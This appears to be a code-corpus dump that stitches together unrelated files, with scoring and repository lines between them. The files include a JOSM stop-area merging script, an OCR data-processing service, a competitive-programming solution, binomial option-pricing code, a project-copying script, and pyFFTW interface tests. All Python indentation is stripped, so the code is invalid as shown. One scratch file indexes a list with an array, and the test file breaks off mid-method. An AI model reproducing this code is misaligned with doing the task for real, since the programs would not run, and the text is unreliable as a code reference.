import org.openstreetmap.josm.data.osm.Way as Way
import org.openstreetmap.josm.data.osm.Relation as Relation
import org.openstreetmap.josm.data.Bounds as Bounds
import org.openstreetmap.josm.data.osm.visitor.BoundingXYVisitor as BoundingXYVisitor
import org.openstreetmap.josm.data.osm.TagCollection as TagCollection
import org.openstreetmap.josm.data.osm.DataSet as DataSet
import org.openstreetmap.josm.data.osm.RelationMember as RelationMember
import org.openstreetmap.josm.actions.search.SearchAction as SearchAction
import org.openstreetmap.josm.actions.mapmode.DeleteAction as DeleteAction
import re, time, sys
import codecs
def getMapView():
if Main.main and Main.main.map:
return Main.main.map.mapView
else:
return None
mv = getMapView()
if mv and mv.editLayer and mv.editLayer.data:
relations = dict();
i = 0;
print "Start";
# Loop through all stop area relations
for relation in mv.editLayer.data.getRelations():
if (relation.get('public_transport') == 'stop_area'):
name = relation.get('name');
if name not in relations.keys():
relations[name] = relation;
elif isinstance(name, basestring):
# Get one node of each relations
for member in relation.getMembers():
if member.isNode():
firstNode = member.getNode();
for member in relations[name].getMembers():
if member.isNode():
secondNode = member.getNode();
# Compare distance between nodes from two relations
distance = firstNode.getCoor().distanceSq(secondNode.getCoor())
# If they are close enough, we assume to have two stop areas we can merge
if distance < 0.00003:
# Add members from one relation to the other
for member in relations[name].getMembers():
relation.addMember(member);
# Delete the other relation
print 'Relation unite! ' + name;
DeleteAction.deleteRelation(Main.getLayerManager().getEditLayer(), relations[name]);
i = i +1;
print i;
| 1.945313 | 2 |
services/process/icdar_process_service.py | ktodorov/historical-ocr | 0 | 12769962 | from entities.cache.cache_options import CacheOptions
import os
from services.file_service import FileService
from torch._C import dtype
import numpy as np
import torch
from tqdm import tqdm
from typing import List, Tuple
from enums.ocr_output_type import OCROutputType
from enums.language import Language
from services.process.process_service_base import ProcessServiceBase
from services.download.ocr_download_service import OCRDownloadService
from services.arguments.ocr_quality_non_context_arguments_service import OCRQualityNonContextArgumentsService
from services.cache_service import CacheService
from services.log_service import LogService
from services.vocabulary_service import VocabularyService
from services.tokenize.base_tokenize_service import BaseTokenizeService
class ICDARProcessService(ProcessServiceBase):
def __init__(
self,
ocr_download_service: OCRDownloadService,
arguments_service: OCRQualityNonContextArgumentsService,
cache_service: CacheService,
vocabulary_service: VocabularyService,
tokenize_service: BaseTokenizeService,
log_service: LogService):
self._arguments_service = arguments_service
self._cache_service = cache_service
self._ocr_download_service = ocr_download_service
self._vocabulary_service = vocabulary_service
self._tokenize_service = tokenize_service
self._log_service = log_service
self._min_occurrence_limit = self._arguments_service.minimal_occurrence_limit
self._vocab_key = f'vocab-{self._get_dataset_string()}-{arguments_service.ocr_output_type.value}'
if not self._vocabulary_service.load_cached_vocabulary(self._vocab_key):
self._log_service.log_debug(
'Vocabulary was not loaded. Attempting to initialize...')
self._initialize_vocabulary()
else:
self._log_service.log_debug('Vocabulary loaded successfully')
def _initialize_vocabulary(self):
self._ocr_download_service.download_data(
self._arguments_service.language)
ocr_data, gs_data = self._read_data()
tokenized_data = self._tokenize_service.tokenize_sequences(
gs_data if self._arguments_service.ocr_output_type == OCROutputType.GroundTruth else ocr_data
)
self._log_service.log_debug(
f'Tokenized {len(tokenized_data)} strings successfully')
self._vocabulary_service.initialize_vocabulary_from_corpus(
tokenized_data,
min_occurrence_limit=self._min_occurrence_limit,
vocab_key=self._vocab_key)
def _generate_ocr_corpora(self):
ocr_data, gs_data = self._read_data()
tokenized_ocr_data = self._tokenize_service.tokenize_sequences(
ocr_data)
tokenized_gs_data = self._tokenize_service.tokenize_sequences(gs_data)
self._save_common_tokens(tokenized_ocr_data, tokenized_gs_data)
ocr_output_type = self._arguments_service.ocr_output_type
data_ids = [self._vocabulary_service.string_to_ids(
x) for x in (tokenized_ocr_data if ocr_output_type == OCROutputType.Raw else tokenized_gs_data)]
result = self._generate_corpora_entries(data_ids)
return result
def _generate_corpora_entries(self, data_ids):
return None
def _save_common_tokens(self, tokenized_ocr_data: List[List[str]], tokenized_gs_data: List[List[str]]):
"""Saves the intersection of the tokens from both output types, as well as the ids of these tokens for the current output type
:param tokenized_ocr_data: The tokenized data for OCR output type
:type tokenized_ocr_data: List[List[str]]
:param tokenized_gs_data: The tokenized data for GT output type
:type tokenized_gs_data: List[List[str]]
"""
self._log_service.log_debug('Saving common tokens')
token_pairs_cache_key = f'common-t-pairs-{self._get_dataset_string()}-{self._arguments_service.ocr_output_type.value}-lim-{self._arguments_service.minimal_occurrence_limit}'
if self._cache_service.item_exists(CacheOptions(token_pairs_cache_key)):
return
common_tokens = self._cache_service.get_item_from_cache(
CacheOptions(
f'common-tokens-{self._get_dataset_string()}',
configuration_specific=False),
callback_function=lambda: self._combine_common_words(tokenized_ocr_data, tokenized_gs_data))
token_id_pairs = []
for common_token in common_tokens:
token_ids = [self._vocabulary_service.string_to_id(common_token)]
if token_ids[0] == self._vocabulary_service.unk_token:
token_ids = None
token_id_pairs.append((common_token, token_ids))
self._cache_service.cache_item(
token_id_pairs,
CacheOptions(token_pairs_cache_key))
self._log_service.log_debug(
f'Saved {len(token_id_pairs)} common token pairs successfully')
def _combine_common_words(self, tokenized_ocr_data: List[List[str]], tokenized_gs_data: List[List[str]]):
ocr_unique_tokens = set(
[item for sublist in tokenized_ocr_data for item in sublist])
gs_unique_tokens = set(
[item for sublist in tokenized_gs_data for item in sublist])
common_tokens = list(ocr_unique_tokens & gs_unique_tokens)
return common_tokens
def _load_file_data(self):
number_of_files = len(self._arguments_service.datasets)
ocr_file_data = []
gs_file_data = []
for i, dataset in enumerate(self._arguments_service.datasets):
print(f'{i}/{number_of_files} \r', end='')
result = self._ocr_download_service.get_downloaded_dataset(dataset)
if result is None:
self._log_service.log_debug(
f'Did not find \'{dataset}\' dataset to load')
continue
else:
self._log_service.log_debug(f'Loading \'{dataset}\' data')
ocr_file_data.extend(result[0])
gs_file_data.extend(result[1])
return ocr_file_data, gs_file_data
def _read_data(self):
ocr_file_data, gs_file_data = self._cache_service.get_item_from_cache(
CacheOptions(
f'ocr-gs-file-data-{self._get_dataset_string()}',
configuration_specific=False),
callback_function=self._load_file_data)
return ocr_file_data, gs_file_data
def _get_dataset_string(self):
return '-'.join(sorted(self._arguments_service.datasets)) | 2 | 2 |
tasks/task_viper/temp.py | chenyanghungry/person-reid-lib | 81 | 12769963 | <gh_stars>10-100
import numpy as np
a = [53, 13, 84, 32, 1]
b = np.random.choice(len(a), 3, True)
print(a[b]) | 2.734375 | 3 |
beginner_contest/133/B.py | FGtatsuro/myatcoder | 0 | 12769964 | _input = [i for i in open(0).read().split('\n') if i]
n, d = [int(i) for i in _input[0].split()]
x_list = [[int(i) for i in x.split()]for x in _input[1:]]
x_list2 = x_list[:]
import math
count = 0
for x1 in x_list:
for x2 in x_list2:
dist = math.sqrt(sum((x1[i]-x2[i])**2 for i in range(d)))
if int(dist) == 0:
continue
if dist.is_integer():
count += 1
print(count//2)
| 3.078125 | 3 |
Quantitative Finance/MultiPeriod_Bionmial.py | darnoceloc/Algorithms | 0 | 12769965 | """
# T: maturity
# n: # option periods
# N: # futures periods
# S: initial stock price
# r: continuously-compounded interest rate
# c: dividend yield
# sigma: annualized volatility
# K: strike price
# cp: +1/-1 with regards to call/put
"""
from __future__ import division
from math import exp, sqrt
import numpy as np
import math
T = 0.25
n = 15 # option periods
N = 15 # futures periods
S = 100 #initial stock price
r = 0.02 #continuously-compounded interest rate
c = 0.01 #dividend yield
sigma = 0.3 #annualized volatility
K = 110 #strike price
cp = -1 #with regards to call/put
def Parameter(T,n,sigma,r,c):
"""Parameter calculation"""
dt = T/n
u = exp(sigma * sqrt(dt))
d = 1/u
q1 = (exp((r-c)*dt)-d)/(u-d)
q2 = 1-q1
R = exp(r*dt)
return (u, d, q1, q2, R)
# =============================================================================
def GenerateTree(T,n,S,sigma,r,c):
"""generate stock tree"""
u, d, q1, q2, R = Parameter(T,n,sigma,r,c)
stockTree = np.zeros((n+1, n+1))
# compute the stock tree
stockTree[0,0] = S
for i in range(1,n+1):
stockTree[0,i] = stockTree[0, i-1]*u
for j in range(1,n+1):
stockTree[j,i] = stockTree[j-1, i-1]*d
return stockTree
# =============================================================================
def StockOptionAM(T,n,S,r,c,sigma,K,cp):
"""first return: American Stock Option Pricing"""
"""second return: when is the earliest time to exercise"""
"""Though it's never optimal to early exercise AM call"""
"""It matters for AM put"""
u, d, q1, q2, R = Parameter(T,n,sigma,r,c)
stockTree = GenerateTree(T,n,S,sigma,r,c)
optionTree = np.zeros((n+1,n+1))
# compute the option tree
for j in range(n+1):
optionTree[j, n] = max(0, cp * (stockTree[j, n]-K))
flag = 0
list = []
for i in range(n-1,-1,-1):
for j in range(i+1):
optionTree[j, i] = max((q1 * optionTree[j, i+1] + q2 * optionTree[j+1, i+1])/R,
cp * (stockTree[j, i] - K))
if (optionTree[j, i] - cp * (stockTree[j, i] - K)) < 1e-10:
flag += 1
list.append(i)
when = n
if(flag): when = list[-1]
print(optionTree, when)
return (optionTree[0,0], when)
z = StockOptionAM(T,n,S,r,c,sigma,K,cp)
option_maturity = 10
class bs_bin_tree:
def __init__(self,T,s0,r,sigma,c,K,n):
self.T = T
self.r = r
self.c = c
self.sigma = sigma
self.K = K
self.s0 = s0
self.n = n
self.u = math.exp(self.sigma*np.sqrt(self.T/self.n))
self.q = (math.exp((self.r-self.c)*T/self.n)-(1/self.u))/(self.u-(1/self.u))
self.R = math.exp(self.r*self.T/self.n)
self.__print_param__()
def __print_param__(self):
print('Time',self.T)
print('Starting Price',self.s0)
print('r',self.r)
print('volatility',self.sigma)
print('dividend yield',self.c)
print('strike',self.K)
print('# period',self.n)
def generate_price(self):
arr=[[self.s0]]
for i in range(self.n):
arr_to_add=[]
for j in range(len(arr[i])):
arr_to_add.append(arr[i][j]/self.u)
if j == (len(arr[i])-1):
arr_to_add.append(arr[i][j]*self.u)
arr.append(arr_to_add)
return arr
def neutral_pricing(self,p1,p2):
price = ((1-self.q)*p1 + (self.q)*p2)/self.R
return price
def eu_put(self):
arr = self.generate_price()
arr_rev = arr[::-1]
res=[]
for i in range(len(arr_rev)):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(self.K-arr_rev[i][j],0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
#a = max(arr_rev[i][j]-strike,0)
#a = max(a,price)
a = price
res_to_add.append(a)
res.append(res_to_add)
return res[::-1]
def eu_call(self):
arr = self.generate_price()
arr_rev = arr[::-1]
res=[]
for i in range(len(arr_rev)):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(arr_rev[i][j]-self.K,0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
#a = max(arr_rev[i][j]-strike,0)
#a = max(a,price)
a = price
res_to_add.append(a)
res.append(res_to_add)
return res[::-1]
def us_call(self):
arr = self.generate_price()
arr_rev = arr[::-1]
res=[]
for i in range(len(arr_rev)):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(arr_rev[i][j]-self.K,0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
a1 = max(arr_rev[i][j]-self.K,0)
a = max(a1,price)
res_to_add.append(a)
res.append(res_to_add)
return res[::-1]
def us_call_price(self):
return self.us_call()[0][0]
def us_put(self):
arr = self.generate_price()
arr_rev = arr[::-1]
res=[]
for i in range(len(arr_rev)):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(self.K-arr_rev[i][j],0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
a1 = max(self.K - arr_rev[i][j],0)
a = max(a1,price)
res_to_add.append(a)
res.append(res_to_add)
return res[::-1]
def us_put_price(self):
return self.us_put()[0][0]
def us_put_early_ex(self):
early_ex = False
early_ex_earning = 0
early_ex_time = self.n
arr = self.generate_price()
arr_rev = arr[::-1]
res=[]
for i in range(len(arr_rev)):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(self.K-arr_rev[i][j],0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
a1 = max(self.K-arr_rev[i][j],0)
if a1 > price:
if early_ex_time == self.n - i:
early_ex_earning = max(early_ex_earning,a1)
else:
early_ex_earning = a1
early_ex =True
early_ex_time = self.n - i
a = max(a1,price)
res_to_add.append(a)
res.append(res_to_add)
return {early_ex_time:early_ex_earning} if early_ex == True else False
def us_put_call_parity(self):
LHS = self.us_put_price() + self.s0 * math.exp(-self.c * self.T)
RHS = self.us_call_price() + self.K * math.exp(-self.r * self.T)
print('Put Side',LHS)
print('Call Side',RHS)
return LHS==RHS
def generate_future_price(self):
arr = self.generate_price()
arr_rev = arr[::-1]
res=[]
for i in range(len(arr_rev)):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
res_to_add.append(arr_rev[i][j])
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])*self.R
res_to_add.append(price)
res.append(res_to_add)
return res[::-1]
def option_on_future(self,option_maturity):
arr = self.generate_future_price()[0:option_maturity+1]
arr_rev = arr[::-1]
res=[]
for i in range(option_maturity+1):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(arr_rev[i][j]-self.K,0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
a1 = max(arr_rev[i][j]-self.K,0)
a = max(a1,price)
res_to_add.append(a)
res.append(res_to_add)
return res[::-1]
def option_price_on_future(self,option_maturity):
return self.option_on_future(option_maturity)[0][0]
def option_on_future_early_ex(self,option_maturity):
arr = self.generate_future_price()[0:option_maturity+1]
arr_rev = arr[::-1]
res=[]
early_ex = False
early_ex_earning = 0
early_ex_time = self.n
for i in range(option_maturity+1):
res_to_add = []
for j in range(len(arr_rev[i])):
if i == 0:
a = max(arr_rev[i][j]-self.K,0)
res_to_add.append(a)
else:
price = self.neutral_pricing(res[i-1][j], res[i-1][j+1])
a1 = max(arr_rev[i][j]-self.K,0)
if a1 > price:
if early_ex_time == option_maturity - i:
early_ex_earning = max(early_ex_earning,a1)
else:
early_ex_earning = a1
early_ex =True
early_ex_time = len(arr_rev) - i -1
a = max(a1,price)
res_to_add.append(a)
res.append(res_to_add)
return {early_ex_time:early_ex_earning} if early_ex == True else False
def nCr(self,n,r):
f = math.factorial
return f(n) / f(r) / f(n-r)
def chooser_option_price(self,option_expire):
call = self.eu_call()[option_expire]
put = self.eu_put()[option_expire]
res=[]
for i in range(len(call)):
res.append(max(call[i],put[i]))
result=0
for j in range(0,len(res)):
result += self.nCr(option_expire,j)* (self.q**(j)) * (1-self.q)**(option_expire-j) * res[j]
return (result/self.R**(option_expire))
tree = bs_bin_tree(T, 100, r, sigma, c, K, n)
print(tree.us_call())
print(tree.us_call_price())
print(tree.us_put())
print(tree.us_put_price())
print(tree.us_put_early_ex())
print(tree.us_put_call_parity())
print(tree.option_on_future(option_maturity))
print(tree.option_price_on_future(option_maturity))
print(tree.option_on_future_early_ex(option_maturity))
print(tree.chooser_option_price(10))
| 3.328125 | 3 |
projects/make-project.py | 2-complex/g2c | 1 | 12769966 | <reponame>2-complex/g2c<filename>projects/make-project.py
import shutil
import sys
import os
def replace_in_file(path, a, b):
f = open(path, 'r')
s = f.read().replace(a, b)
f.close()
f = open(path, 'w')
f.write(s)
f.close()
def replace_in_filename(path, a, b):
j = len(path)-1
if path[-1]!='/':
j-=1
while j>0 and path[j]!='/':
j-=1
base = path[:j]
filename = path[j:]
if a in filename:
newname = filename.replace(a, b)
os.rename(path, base+newname)
return base+newname
return path
def deepreplace(path, a, b):
l = []
if path == '':
path = '.'
print path
if os.path.isdir(path):
l = os.listdir(path)
for f in l:
deepreplace(os.path.join(path, f), a, b)
else:
replace_in_file(path, a, b)
replace_in_filename(path, a, b)
def go():
print "****************************************************************************************"
print "* Interactive script for creating a project directory based on a direcotry in blanks/. *"
print "****************************************************************************************"
print ""
script_path = os.path.dirname(os.path.realpath(__file__))
cello_dir = os.path.realpath("..")
blanks_dir = os.path.join(cello_dir, "blanks")
while not os.path.isdir(blanks_dir):
print "Could not find blanks/ directory " + blanks_dir + ". Where is cello?"
cello_dir = raw_input("Enter path to cello root directory: ")
blanks_dir = os.path.join(cello_dir, "projects", "blanks")
print ""
print "At what path would you like to place the new project directory?"
target_path = raw_input("(default = " + os.getcwd() + ") ? ")
print ""
blanks = os.listdir(blanks_dir)
def visible(s):
return s[0] != '.'
blanks = filter(visible, blanks)
blank_name = ""
while blank_name not in blanks:
print "What blank project would you like to copy from? (" + ", ".join(blanks) + ")"
blank_name = raw_input("(select one of: " + ", ".join(blanks) + ") ? ")
print ""
source_path = os.path.join(blanks_dir, blank_name)
destination_path = os.path.join(os.getcwd(), blank_name)
print "Will make a project by copying..."
print "from: " + source_path
print "to: " + destination_path
print ""
if os.path.exists(destination_path):
response = ''
while not response in ['y', 'n', 'yes', 'no']:
print destination_path + " already exists. Would you like to replace it?"
response = raw_input("This will delete destination_path and make a new one (y/n) ? ").lower()
if not response.startswith('y'):
print "Goodbye."
print ""
return
if os.path.exists(destination_path):
try:
shutil.rmtree(destination_path)
except:
print "Exception when trying to remove " + destination_path
print "Bailing."
print ""
return
print "What shall the name of the project be?"
project_name = raw_input("New project name ? ")
shutil.copytree(source_path, destination_path)
deepreplace(destination_path, "Blank", project_name)
go()
| 3.25 | 3 |
test/test_pyfftw_numpy_interface.py | insertinterestingnamehere/pyFFTW | 0 | 12769967 | <filename>test/test_pyfftw_numpy_interface.py
# Copyright 2014 Knowledge Economy Developments Ltd
#
# <NAME>
# <EMAIL>
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
from pyfftw import interfaces
from .test_pyfftw_base import run_test_suites
import unittest
import numpy
from numpy import fft as np_fft
import inspect
import warnings
import copy
warnings.filterwarnings('always')
if numpy.version.version <= '1.6.2':
# We overwrite the broken _cook_nd_args with a fixed version.
from ._cook_nd_args import _cook_nd_args
numpy.fft.fftpack._cook_nd_args = _cook_nd_args
complex_dtypes = (numpy.complex64, numpy.complex128, numpy.clongdouble)
real_dtypes = (numpy.float32, numpy.float64, numpy.longdouble)
def make_complex_data(shape, dtype):
ar, ai = dtype(numpy.random.randn(2, *shape))
return ar + 1j*ai
def make_real_data(shape, dtype):
return dtype(numpy.random.randn(*shape))
functions = {
'fft': 'complex',
'ifft': 'complex',
'rfft': 'r2c',
'irfft': 'c2r',
'rfftn': 'r2c',
'hfft': 'c2r',
'ihfft': 'r2c',
'irfftn': 'c2r',
'rfft2': 'r2c',
'irfft2': 'c2r',
'fft2': 'complex',
'ifft2': 'complex',
'fftn': 'complex',
'ifftn': 'complex'}
acquired_names = ('fftfreq', 'fftshift', 'ifftshift')
class InterfacesNumpyFFTTestModule(unittest.TestCase):
''' A really simple test suite to check the module works as expected.
'''
def test_acquired_names(self):
for each_name in acquired_names:
numpy_fft_attr = getattr(numpy.fft, each_name)
acquired_attr = getattr(interfaces.numpy_fft, each_name)
self.assertIs(numpy_fft_attr, acquired_attr)
class InterfacesNumpyFFTTestFFT(unittest.TestCase):
io_dtypes = {
'complex': (complex_dtypes, make_complex_data),
'r2c': (real_dtypes, make_real_data),
'c2r': (complex_dtypes, make_complex_data)}
validator_module = np_fft
test_interface = interfaces.numpy_fft
func = 'fft'
axes_kw = 'axis'
overwrite_input_flag = 'overwrite_input'
default_s_from_shape_slicer = slice(-1, None)
test_shapes = (
((100,), {}),
((128, 64), {'axis': 0}),
((128, 32), {'axis': -1}),
((59, 100), {}),
((59, 99), {'axis': -1}),
((59, 99), {'axis': 0}),
((32, 32, 4), {'axis': 1}),
((64, 128, 16), {}),
)
# invalid_s_shapes is:
# (size, invalid_args, error_type, error_string)
invalid_args = (
((100,), ((100, 200),), TypeError, ''),
((100, 200), ((100, 200),), TypeError, ''),
((100,), (100, (-2, -1)), TypeError, ''),
((100,), (100, -20), IndexError, ''))
realinv = False
@property
def test_data(self):
for test_shape, kwargs in self.test_shapes:
axes = self.axes_from_kwargs(kwargs)
s = self.s_from_kwargs(test_shape, kwargs)
if self.realinv:
test_shape = list(test_shape)
test_shape[axes[-1]] = test_shape[axes[-1]]//2 + 1
test_shape = tuple(test_shape)
yield test_shape, s, kwargs
def __init__(self, *args, **kwargs):
super(InterfacesNumpyFFTTestFFT, self).__init__(*args, **kwargs)
# Assume python 3, but keep backwards compatibility
if not hasattr(self, 'assertRaisesRegex'):
self.assertRaisesRegex = self.assertRaisesRegexp
def validate(self, array_type, test_shape, dtype,
s, kwargs):
# Do it without the cache
# without:
interfaces.cache.disable()
self._validate(array_type, test_shape, dtype, s, kwargs)
def munge_input_array(self, array, kwargs):
return array
def _validate(self, array_type, test_shape, dtype,
s, kwargs):
input_array = self.munge_input_array(
array_type(test_shape, dtype), kwargs)
orig_input_array = copy.copy(input_array)
np_input_array = numpy.asarray(input_array)
if np_input_array.dtype == 'clongdouble':
np_input_array = numpy.complex128(input_array)
elif np_input_array.dtype == 'longdouble':
np_input_array = numpy.float64(input_array)
with warnings.catch_warnings(record=True) as w:
# We catch the warnings so as to pick up on when
# a complex array is turned into a real array
if 'axes' in kwargs:
axes = {'axes': kwargs['axes']}
elif 'axis' in kwargs:
axes = {'axis': kwargs['axis']}
else:
axes = {}
try:
test_out_array = getattr(self.validator_module, self.func)(
copy.copy(np_input_array), s, **axes)
except Exception as e:
interface_exception = None
try:
getattr(self.test_interface, self.func)(
copy.copy(input_array), s, **kwargs)
except Exception as _interface_exception:
# It's necessary to assign the exception to the
# already defined variable in Python 3.
# See http://www.python.org/dev/peps/pep-3110/#semantic-changes
interface_exception = _interface_exception
# If the test interface raised, so must this.
self.assertEqual(type(interface_exception), type(e),
msg='Interface exception raised. ' +
'Testing for: ' + repr(e))
return
output_array = getattr(self.test_interface, self.func)(
copy.copy(input_array), s, **kwargs)
if (functions[self.func] == 'r2c'):
if numpy.iscomplexobj(input_array):
if len(w) > 0:
# Make sure a warning is raised
self.assertIs(
w[-1].category, numpy.ComplexWarning)
self.assertTrue(
numpy.allclose(output_array, test_out_array,
rtol=1e-2, atol=1e-4))
input_precision_dtype = numpy.asanyarray(input_array).real.dtype
self.assertEqual(input_precision_dtype,
output_array.real.dtype)
if (not self.overwrite_input_flag in kwargs or
not kwargs[self.overwrite_input_flag]):
self.assertTrue(numpy.allclose(input_array,
orig_input_array))
return output_array
def axes_from_kwargs(self, kwargs):
argspec = inspect.getargspec(getattr(self.test_interface, self.func))
default_args = dict(list(zip(
argspec.args[-len(argspec.defaults):], argspec.defaults)))
if 'axis' in kwargs:
axes = (kwargs['axis'],)
elif 'axes' in kwargs:
axes = kwargs['axes']
if axes is None:
axes = default_args['axes']
else:
if 'axis' in default_args:
# default 1D
axes = (default_args['axis'],)
else:
# default nD
axes = default_args['axes']
if axes is None:
axes = (-1,)
return axes
def s_from_kwargs(self, test_shape, kwargs):
''' Return either a scalar s or a tuple depending on
whether axis or axes is specified
'''
argspec = inspect.getargspec(getattr(self.test_interface, self.func))
default_args = dict(list(zip(
argspec.args[-len(argspec.defaults):], argspec.defaults)))
if 'axis' in kwargs:
s = test_shape[kwargs['axis']]
elif 'axes' in kwargs:
axes = kwargs['axes']
if axes is not None:
s = []
for each_axis in axes:
s.append(test_shape[each_axis])
else:
# default nD
s = []
try:
for each_axis in default_args['axes']:
s.append(test_shape[each_axis])
except TypeError:
try:
s = list(test_shape[
self.default_s_from_shape_slicer])
except TypeError:
# We had an integer as the default, so force
# it to be a list
s = [test_shape[self.default_s_from_shape_slicer]]
else:
if 'axis' in default_args:
# default 1D
s = test_shape[default_args['axis']]
else:
# default nD
s = []
try:
for each_axis in default_args['axes']:
s.append(test_shape[each_axis])
except TypeError:
s = None
return s
def test_valid(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
s = None
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
def test_on_non_numpy_array(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
array_type = (lambda test_shape, dtype:
dtype_tuple[1](test_shape, dtype).tolist())
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
s = None
self.validate(array_type,
test_shape, dtype, s, kwargs)
def test_fail_on_invalid_s_or_axes(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, args, exception, e_str in self.invalid_args:
input_array = dtype_tuple[1](test_shape, dtype)
self.assertRaisesRegex(exception, e_str,
getattr(self.test_interface, self.func),
*((input_array,) + args))
def test_same_sized_s(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
def test_bigger_s(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
try:
for each_axis, length in enumerate(s):
s[each_axis] += 2
except TypeError:
s += 2
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
def test_smaller_s(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
try:
for each_axis, length in enumerate(s):
s[each_axis] -= 2
except TypeError:
s -= 2
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
def check_arg(self, arg, arg_test_values, array_type, test_shape,
dtype, s, kwargs):
'''Check that the correct arg is passed to the builder'''
# We trust the builders to work as expected when passed
# the correct arg (the builders have their own unittests).
return_values = []
input_array = array_type(test_shape, dtype)
def fake_fft(*args, **kwargs):
return_values.append((args, kwargs))
return (args, kwargs)
try:
# Replace the function that is to be used
real_fft = getattr(self.test_interface, self.func)
setattr(self.test_interface, self.func, fake_fft)
_kwargs = kwargs.copy()
for each_value in arg_test_values:
_kwargs[arg] = each_value
builder_args = getattr(self.test_interface, self.func)(
input_array.copy(), s, **_kwargs)
self.assertTrue(builder_args[1][arg] == each_value)
# make sure it was called
self.assertTrue(len(return_values) > 0)
except:
raise
finally:
# Make sure we set it back
setattr(self.test_interface, self.func, real_fft)
# Validate it aswell
for each_value in arg_test_values:
_kwargs[arg] = each_value
builder_args = getattr(self.test_interface, self.func)(
input_array.copy(), s, **_kwargs)
self.validate(array_type, test_shape, dtype, s, _kwargs)
def test_auto_align_input(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
self.check_arg('auto_align_input', (True, False),
dtype_tuple[1], test_shape, dtype, s, kwargs)
def test_auto_contiguous_input(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
self.check_arg('auto_contiguous', (True, False),
dtype_tuple[1], test_shape, dtype, s, kwargs)
def test_bigger_and_smaller_s(self):
dtype_tuple = self.io_dtypes[functions[self.func]]
for dtype in dtype_tuple[0]:
i = -1
for test_shape, s, kwargs in self.test_data:
try:
for each_axis, length in enumerate(s):
s[each_axis] += i * 2
i *= i
except TypeError:
s += i * 2
i *= i
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
def test_dtype_coercian(self):
# Make sure we input a dtype that needs to be coerced
if functions[self.func] == 'r2c':
dtype_tuple = self.io_dtypes['complex']
else:
dtype_tuple = self.io_dtypes['r2c']
for dtype in dtype_tuple[0]:
for test_shape, s, kwargs in self.test_data:
s = None
self.validate(dtype_tuple[1],
test_shape, dtype, s, kwargs)
def test_planner_effort(self):
'''Test the planner effort arg
'''
dtype_tuple = self.io_dtypes[functions[self.func]]
test_shape = (16,)
for dtype in dtype_tuple[0]:
s = None
if self.axes_kw == 'axis':
kwargs = {'axis': -1}
else:
kwargs = {'axes': (-1,)}
for each_effort in ('FFTW_ESTIMATE', 'FFTW_MEASURE',
'FFTW_PATIENT', 'FFTW_EXHAUSTIVE'):
kwargs['planner_effort'] = each_effort
self.validate(
dtype_tuple[1], test_shape, dtype, s, kwargs)
kwargs['planner_effort'] = 'garbage'
self.assertRaisesRegex(ValueError, 'Invalid planner effort',
self.validate,
*(dtype_tuple[1], test_shape, dtype, s, kwargs))
def test_threads_arg(self):
'''Test the threads argument
'''
